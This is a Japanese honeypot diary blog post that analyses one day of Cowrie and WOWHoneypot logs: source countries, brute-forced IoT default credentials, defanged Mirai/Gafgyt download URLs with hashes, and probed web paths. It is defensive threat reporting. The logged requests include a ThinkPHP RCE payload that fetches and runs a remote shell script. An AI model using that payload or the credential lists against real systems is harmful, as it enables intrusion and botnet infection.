ハニーポット観察日記(2019/01/05) 「アメリカからのアクセス件数が過去最大」

はじめに
Cowrie
WOWHoneypot

はじめに

こんにちは。cute_otterです。
今日はWOWHoneypotのCUI版ログビューワーを作っていました。
完成したら公開してみたい...

Cowrie

ハニーポット「Cowrie」で2019/01/05 (土) 00:00~23:59 UTC(運用54日目)に取得したログの簡易分析です。

概況

集計期間 : 2019/01/05 (土) 00:00~23:59 UTC
総イベント件数 : 1,067,671 件 (前日比 +330,697 件)
- コマンド実行成功 : 472,451 件 (前日比 +157,205 件)
- コマンド入力 : 359,686 件 (前日比 +109,263 件)
- ファイルダウンロード成功 : 73,038 件 (前日比 +24,790 件)
- セッションクローズ : 33,416 件 (前日比 +3,942 件)
- 新しいコネクション : 33,416 件 (前日比 +3,939 件)
- コマンド実行失敗 : 31,785 件 (前日比 +18,188 件)
- ログイン成功 : 14,727 件 (前日比 +3,768 件)
- Cowrieによってエミュレートされたアーキテクチャ : 10,489 件 (前日比 +3,783 件)
- TTYログ取得終了 : 10,489 件 (前日比 +3,784 件)
- 外部へのTCP/IPリクエストの送出 : 9,610 件 (前日比 -110 件)
- ファイルダウンロード失敗 : 5,499 件 (前日比 +177 件)
- クライアントのSSHバージョン : 4,394 件 (前日比 -76 件)
- SSH鍵交換 : 4,377 件 (前日比 -88 件)
- ログイン失敗 : 2,368 件 (前日比 +2,239 件)
- 外部へのTCP/IPデータの送出 : 1,924 件 (前日比 -82 件)
- ターミナルサイズ : 2 件 (前日比 -13 件)
ログイン試行件数 : 17,095 件 (前日比 +6,007 件)
SSHコネクション件数 : 13,069 件 (前日比 -64 件)
Telnetコネクション件数 : 20,347 件 (前日比 +4,003 件)
ユニークIPアドレス件数 : 470 件 (前日比 +243 件)
アクセス元の国数 : 52 カ国 (前日比 +10 カ国)
TTY件数 : 10,489 件 (前日比 +3,784 件)

特徴

イベント件数の大幅な増加
- 前日(2019/01/04)より33万件ほど増加
- 14時~15時のイベント件数が大幅に増加
  - 普段は2~4万件ですが、上記の期間は10万件を超えていました。
ログイン試行件数の増加
- 前日(2019/01/04)より6,000件ほど増加
Telnetコネクション件数の増加
- 前日(2019/01/04)より4,000件ほど増加
ユニークIPアドレス件数の増加
- 前日(2019/01/04)より240件ほど増加
アメリカからのアクセス件数が増加
- 前日(2019/01/04)より19万件ほど増加
- アメリカからのアクセス件数が過去最大となりました。

ダッシュボード

ダッシュボードは以下の通りです。

国別のアクセス件数

国別のアクセス件数の変遷(2019/01/05)は以下の通りです。

続いて、国別のアクセス件数(上位20位)は以下の通りです。

順位	国名	件数	前日の順位	前日の件数	件数差	備考
1.	United States	547,428	1.	356,729	+190,699	-
2.	Italy	242,216	2.	327,194	-84,978	-
3.	United Kingdom	48,606	3.	17,998	+30,608	-
4.	China	44,427	12.	665	+43,762	-
5.	Russia	37,078	8.	2,015	+35,063	-
6.	Israel	35,268	24.	36	+35,232	-
7.	Republic of Korea	25,096	17.	77	+25,019	-
8.	Ireland	15,121	4.	15,156	-35	-
9.	Cyprus	14,799	-	0	+14,779	-
10.	Azerbaijan	14,027	-	0	+14,027	-
11.	Spain	9,736	21.	48	+9,688	-
12.	Singapore	4,507	6.	4,072	+435	-
13.	Latvia	3,400	16.	188	+3,212	-
14.	France	3,011	33.	12	+2,999	-
15.	Vietnam	2,574	13.	661	+1,913	-
16.	Poland	2,489	40.	7	+2,482	-
17.	Canada	2,466	10.	718	+1,748	-
18.	Taiwan	2,444	14.	288	+2,156	-
19.	India	2,266	9.	1,607	+659	-
20.	Netherlands	1,546	5.	5,542	-3,996	-

アメリカからのアクセス件数が前日(2019/01/04)の356,729件から19万件ほど増加し、547,428件となりました。
- アメリカからのアクセス件数が過去最大となりました。
- 特に、14時~15時のアクセス件数が増加しました。
イタリアからのアクセス件数が前日(2019/01/04)の327,194件から8万5000件ほど減少し、242,216件となりました。
普段アクセス件数が少ないイスラエル、韓国、キプロス、アゼルバイジャン、スペインからのアクセス件数が大幅に増加しました。
- イスラエル、韓国、キプロス、アゼルバイジャンからのアクセスが14時~15時に集中していました。
普段から一定のアクセス件数があるイギリス、中国、ロシアからのアクセス件数も増加しました。
- 中国、ロシアからのアクセスも14時~15時に集中していました。

14時台のアクセス件数

14時台の国別のアクセス件数(上位10位)は以下の通りです。

順位	国名	件数
1.	United States	62,265
2.	China	24,703
3.	United Kingdom	17,562
4.	Israel	16,804
5.	Russia	16,481
6.	Republic of Korea	14,981
7.	Azerbaijan	8,983
8.	Cyprus	8,705
9.	France	2,865
10.	Italy	2,397

15時台のアクセス件数

15時台の国別のアクセス件数(上位10位)は以下の通りです。

順位	国名	件数
1.	United States	42,725
2.	China	19,393
3.	Russia	19,111
4.	Israel	18,464
5.	Republic of Korea	9,930
6.	Cyprus	6,094
7.	Azerbaijan	5,044
8.	Poland	1,341
9.	Taiwan	971
10.	United Kingdom	768

イタリアからのアクセス件数の変遷

イタリアからのアクセス件数の変遷(2018/12/24~2019/01/05)は以下の通りです。

2018/12/26から件数が増加し始め、2018/12/28に、一時的に件数が減少しました。
しかし、2018/12/29から再び件数が増加し始め、2018/12/30~2019/01/01にかけてピークを迎え、毎日30万件以上のアクセスがありました。
2019/01/02には件数が大幅に減少し、430件となりましたが、2019/01/03から再び増加し始め、2019/01/04には327,194件となりました。
2019/01/05には8万5000件ほど減少し、242,216件となりました。

イベント件数

イベント件数の変遷(2019/01/05)は以下の通りです。

14時~15時のイベント件数が大幅に増加しました。
上記の期間で増加したイベントはコマンド実行成功、コマンド入力、ファイルダウンロード成功、コマンド実行失敗でした。

国別のログイン試行

国別のログイン試行の件数(上位10位)は以下の通りです。

順位	国名	件数	前日の順位	前日の件数	件数差	備考
1.	United States	5,334	1.	3,066	+2,268	-
2.	United Kingdom	2,475	3.	2,211	+264	-
3.	Italy	2,262	2.	3,018	-756	-
4.	Ireland	1,914	4.	1,925	-11	-
5.	China	768	9.	88	+680	-
6.	Russia	723	5.	187	+536	-
7.	Republic of Korea	613	16.	8	+605	-
8.	Israel	562	25.	2	+560	-
9.	Canada	353	15.	16	+337	-
10.	Taiwan	289	12.	25	+264	-

アメリカからのログイン試行件数が前日(2019/01/04)より2,200件ほど増加し、5,334件となりました。
イタリアからのログイン試行件数が前日(2019/01/04)より750件ほど減少し、2,262件となりました

ログイン試行で使用されたユーザ名とパスワード

ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。

順位	ユーザ名	パスワード	件数	前日の順位	前日の件数	件数差	備考
1.	admin	admin	4,282	1.	4,278	+4	-
2.	root	88888888	864	2.	1,031	-167	-
3.	root	GM8182	443	4.	524	-81	Grain Media製のDVRを狙ったものと思われる(参照)
4.	guest	123456	441	3.	525	-84	-
5.	support	1234	424	5.	512	-88	-
6.	admin	admin1	424	6.	501	-77	-
7.	root	(空欄)	325	7.	246	+79	-
8.	root	vizxv	289	9.	226	+63	Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)
9.	user	user	279	10.	177	+102	-
10.	root	666666	270	8.	228	+42	Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)
11.	root	pass	235	17.	136	+99	-
12.	root	123456	222	11.	175	+47	-
13.	root	888888	210	22.	90	+120	Zhejiang Dahua Technology製のDVRを狙ったものと思われる(参照)
14.	root	default	200	21.	93	+107	-
15.	root	12345	189	20.	103	+86	-
16.	support	support	178	12.	159	+19	-
17.	root	xc3511	175	14.	147	+28	Xiongmai製のDVRを狙ったものと思われる(参照)
18.	root	hi3518	173	13.	147	+26	HiSilicon Technologies製のIPカメラを狙ったものと思われる(参照)
19.	root	system	169	18.	129	+40	-
20.	admin	4321	161	15.	144	+17	-

admin/adminの組み合わせのほとんどがイギリスとアイルランドからのログイン試行の際に使用されていました。
- イギリスが2,136件(4,278件中)、アイルランドが1,912件(4,278件中)でした。
前日と同じく、root/88888888、root/GM8182、guest/123456、support/1234、admin/admin1の組み合わせのほとんどがイタリアからのログイン試行の際に使用されていました。
- root/88888888は744件(864件中)でした。
- root/GM8182は377件(443件中)でした。
- guest/123456は373件(441件中)でした。
- support/1234は367件(424件中)でした。
- admin/admin1は366件(424件中)でした。

ダウンロードされたファイル

ダウンロードされたファイルは以下の通りです。

※VT : VirusTotal

順位	ダウンロード元	MD5	検出率(VT)	件数	備考
1.	hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86	4147e375f325878fe3c3962c3d4ac411	37/57	2,441	Mirai
2.	hxxp://195[.]231[.]0[.]52:80/AB4g5/Josho[.]x86	edccb855814fc2f1aeeff40a90845464	20/60	1,410	Mirai
3.	hxxp://195[.]231[.]0[.]185:80/AB4g5/Josho[.]x86	aa496313be71695fda7e415999233aa9	19/55	682	Mirai
4.	hxxp://46[.]101[.]60[.]55:80/bins/301[.]x86	5fb9f49cdb54394d5121ba5d82545ad5	20/58	152	Mirai
5.	hxxp://209[.]141[.]43[.]15:80/bins/x86	d3f0f38a282c261ea2fea7068b9615e4	27/58	141	Mirai
6.	hxxp://167[.]99[.]224[.]50:80/AB4g5/Josho[.]x86	a5381334416e082e697ee2b1ea07927b	17/56	138	Mirai
7.	hxxp://157[.]230[.]3[.]233:80/Binarys/Owari[.]x86	6f64d5a1351178c07a03160a2ae76e75	19/58	89	Mirai
8.	hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86	0f6fa2e22d9de3864e7d60ed6c0cb4b5	34/58	85	Mirai or Gaygyt
9.	hxxp://167[.]99[.]229[.]112:80/8x868	a65849fe667dcc5eadd920d427785642	21/57	83	Gafgyt
10.	hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86	e68bd8a8712ce1788faa15c9813c00ab	20/59	67	Mirai
11.	hxxp://209[.]141[.]57[.]94/bins[.]sh	b05e61bc07d161f9fdda1fa8cb744514	21/57	40	Mirai(ダウンローダー?)
12.	hxxp://209[.]141[.]57[.]94:80/AB4g5/Josho[.]x86	87f0d6b6d3665f8eca59174b7ff6ba17	8/59	23	Tsunami
13.	hxxp://199[.]38[.]243[.]9:80/33bi/mirai[.]x86	564e572d77a86ab7161b4b67b7f81981	24/58	23	Mirai
14.	hxxp://149[.]248[.]56[.]218:80/OwO/Tsunami[.]x86	bf8acbf615ef4f5d92baf2dc98a520cc	9/57	18	Mirai
15.	hxxp://209[.]97[.]185[.]168:80/bins/kirai[.]x86	3906a2f9b3192664762e3f6eb84f4c18	16/56	18	Mirai
16.	hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86	e4ae3f23bbdbcb67b52be4616ffe280b	21/57	13	Mirai
17.	hxxp://149[.]248[.]56[.]218:80/OwO/Tsunami[.]x86	d05c641c291930c76abdb080c35179a0	9/58	12	Mirai
18.	hxxp://185[.]244[.]25[.]138:80/Trinity[.]x86	d680f80cc1e19db1b2a8033ef9f3d5a5	8/56	10	Mirai
19.	hxxp://217[.]61[.]105[.]126:80/shiro[.]x86	bfaf3d11d11b645c9a2002354248a024	20/58	9	Mirai or Gafgyt
20.	hxxp://167[.]99[.]219[.]142:80/bins/dark[.]x86	c81e2c6cae869a1c5b59d0fda16f4794	19/59	5	Mirai
21.	hxxp://138[.]197[.]2[.]42:80/AB4g5/Josho[.]x86	aa32b1f8967c0fcbcf369f04209aca03	20/59	5	Mirai
22.	hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido	236cc078eb84e9e14f1112a52e74abc9	36/59	4	Mirai
23.	hxxp://185[.]244[.]25[.]174/bins[.]sh	b47a843a862e9313f2cbce797e6f3de2	25/58	2	Mirai(ダウンローダー?)
24.	hxxp://205[.]185[.]126[.]185:80/AB4g5/Josho[.]x86	a715e55dc5bb798fbf039dd9d4b66b63	23/57	2	Mirai
25.	hxxp://220[.]175[.]7[.]69:57790/fxBfqDaPTQrfdJdPQblx	cc567027de6fb900fa5c429e24258c3c	20/59	1	Mirai
26.	hxxp://61[.]191[.]142[.]244:4838/fxBfqDaPTQrfdJdPQblx	cc567027de6fb900fa5c429e24258c3c	20/59	1	Mirai
27.	hxxp://219[.]217[.]204[.]110:64263/fxBfqDaPTQrfdJdPQblx	cc567027de6fb900fa5c429e24258c3c	20/59	1	Mirai
28.	hxxp://35[.]235[.]102[.]123:80/bins/telnet[.]x86	12747042919cf473e147c0201773bed9	21/59	1	Mirai
29.	hxxp://219[.]217[.]204[.]106:45971/fxBfqDaPTQrfdJdPQblx	cc567027de6fb900fa5c429e24258c3c	20/59	1	Mirai
30.	hxxp://112[.]184[.]63[.]226:10259/fxBfqDaPTQrfdJdPQblx	cc567027de6fb900fa5c429e24258c3c	20/59	1	Mirai

Mirai(亜種含む)やGafgyt(亜種含む)のほか、Tsunami(亜種?)と思われるマルウェアがダウンロードされていました。

Cowrieで取得したログの簡易分析は以上です。

WOWHoneypot

続いて、ハニーポット「WOWHoneypot」で2019/01/05 (土) 00:00~23:59 UTC(運用2日目)に取得したログの簡易分析です。

概況

集計期間 : 2019/01/05 (土) 00:00~23:59 UTC
総アクセス件数 : 1,058 件 (前日比 +619 件)
ユニークIPアドレス件数 : 23 件 (前日比 -5 件)
アクセス元の国数 : 18 カ国 (前日比 +5 件)

特徴

総アクセス件数が増加
- 前日(2019/01/04)より620件ほど増加

国別のアクセス件数

国別のアクセス件数は以下の通りです。

順位	国名	件数	前日の順位	前日の件数	件数差	備考
1.	China	458	1.	386	+72	-
2.	Hong Kong	349	-	0	+349	-
3.	Thailand	228	11.	1	+227	-
4.	United States	6	4.	3	+3	-
5.	Brazil	3	3.	5	-2	-
6.	Indonesia	2	6.	2	+-0	-
7.	Japan	1	-	0	+1	-
8.	Ecuador	1	-	0	+1	-
9.	Belgium	1	-	0	+1	-
10.	India	1	7.	1	+-0	-
11.	Bangladesh	1	-	0	+1	-
12.	Russia	1	-	0	+1	-
13.	Germany	1	-	0	+1	-
14.	Lebanon	1	-	0	+1	-
15.	Latvia	1	-	0	+1	-
16.	Netherlands	1	12.	1	+-0	-
17.	Spain	1	13.	1	+-0	-
18.	United Kingdom	1	-	0	+1	-

中国、香港、タイからのアクセス件数が増加しました。
前日(2019/01/04)は、カナダから34件のアクセスがありましたが、今日は0件でした。

メソッド

メソッドの件数は以下の通りです。

順位	メソッド	件数	前日の順位	前日の件数	件数差	備考
1.	GET	543	1.	297	+246	-
2.	POST	511	2.	140	+371	-
3.	PROPFIND	4	3.	2	+2	-

HTTPバージョン

HTTPバージョンの件数は以下の通りです。

順位	HTTPバージョン	件数	前日の順位	前日の件数	件数差	備考
1.	HTTP/1.1	1057	1.	437	+620	-
2.	HTTP/1.0	1	2.	2	-1	-

HTTP/1.0は/へのアクセスでした。

Tomcatの管理ページにおけるBasic認証

Tomcatの管理ページ(/manager/html)におけるBasic認証で使用されたユーザ名とパスワードの組み合わせは以下の通りです。

順位	ユーザ名	パスワード	件数	前日の順位	前日の件数	件数差	備考
1.	admin	(空欄)	3	1.	2	+1	-
2.	admin	admin	3	2.	2	+1	-
3.	admin	123456	3	3.	2	+1	-
4.	admin	tomcat	3	4.	2	+1	-
5.	tomcat	(空欄)	3	8.	1	+2	-
6.	tomcat	tomcat	3	5.	2	+1	-
7.	tomcat	123456	3	9.	1	+2	-
8.	tomcat	admin	3	6.	2	+1	-
9.	tomcat	s3cret	3	7.	2	+1	-

アクセス先

アクセス先(上位15位+気になったもの)は以下の通りです。

順位	アクセス先	件数	前日の順位	前日の件数	件数差	備考
1.	GET /manager/html HTTP/1.1	30	2.	18	+12	Tomcatの管理ページに対するログイン試行
2.	GET / HTTP/1.1	17	1.	18	-1	トップページへのアクセス
3.	POST /qq.php HTTP/1.1	12	3.	6	+6	WebShellの探査
4.	POST /confg.php HTTP/1.1	12	-	0	+12	WebShellの探査
5.	POST /1.php HTTP/1.1	10	-	0	+10	WebShellの探査
6.	GET /shell.php HTTP/1.1	8	4.	4	+4	WebShellの探査
7.	GET /cmd.php HTTP/1.1	8	5.	4	+4	WebShellの探査
8.	POST /xx.php HTTP/1.1	8	6.	4	+4	WebShellの探査
9.	POST /conflg.php HTTP/1.1	8	-	0	+8	WebShellの探査
10.	POST /q.php HTTP/1.1	8	7.	4	+4	WebShellの探査
11.	GET /admin/phpMyAdmin/index.php HTTP/1.1	8	9.	4	+4	phpMyAdminの探査
12.	GET /www/phpMyAdmin/index.php HTTP/1.1	8	16.	3	+5	phpMyAdminの探査
13.	GET /tools/phpMyAdmin/index.php HTTP/1.1	8	10.	4	+4	phpMyAdminの探査
14.	GET /claroline/phpMyAdmin/index.php HTTP/1.1	8	11.	4	+4	phpMyAdminの探査
15.	GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1	8	12.	4	+4	phpMyAdminの探査
...	...	...	...	...	...	...
21.	PROPFIND / HTTP/1.1	4	18.	2	+2	Microsoft IIS 6.0の脆弱性 CVE-2017-7269を狙った攻撃
...	...	...	...	...	...	...
122.	GET /xampp/phpmyadmin/index.php HTTP/1.1	4	129.	2	+2	phpMyAdminの探査
...	...	...	...	...	...	...
212.	GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1	3	159.	2	+1	phpMyAdminの探査
...	...	...	...	...	...	...
311.	GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://167[.]99[.]219[.]142/ex[.]sh;chmod%20777%20ex.sh;sh%20ex[.]sh HTTP/1.1	1	222.	1	+-0	ThinkPHPフレームワークの脆弱性(RCE)を狙った攻撃(参照)
...	...	...	...	...	...	...
314.	GET /.well-known/security.txt HTTP/1.1	1	-	0	+1	SSL証明書(ファイル認証方式)の発行の際に生じる一時ファイルの探査

S-Owl(id:Sec-Owl)さんがこちらの記事などで指摘されているThinkPHPフレームワークの脆弱性(RCE)を狙った攻撃がありました。

WOWHoneypotで取得したログの簡易分析は以上です。

cute_otter’s blog

ハニーポットの観察日記を付けています

ハニーポット観察日記(2019/01/05) 「アメリカからのアクセス件数が過去最大」

はじめに

Cowrie

概況

特徴

ダッシュボード

国別のアクセス件数

14時台のアクセス件数

15時台のアクセス件数

イタリアからのアクセス件数の変遷

イベント件数

国別のログイン試行

ログイン試行で使用されたユーザ名とパスワード

ダウンロードされたファイル

WOWHoneypot

概況

特徴

国別のアクセス件数

メソッド

HTTPバージョン

Tomcatの管理ページにおけるBasic認証

アクセス先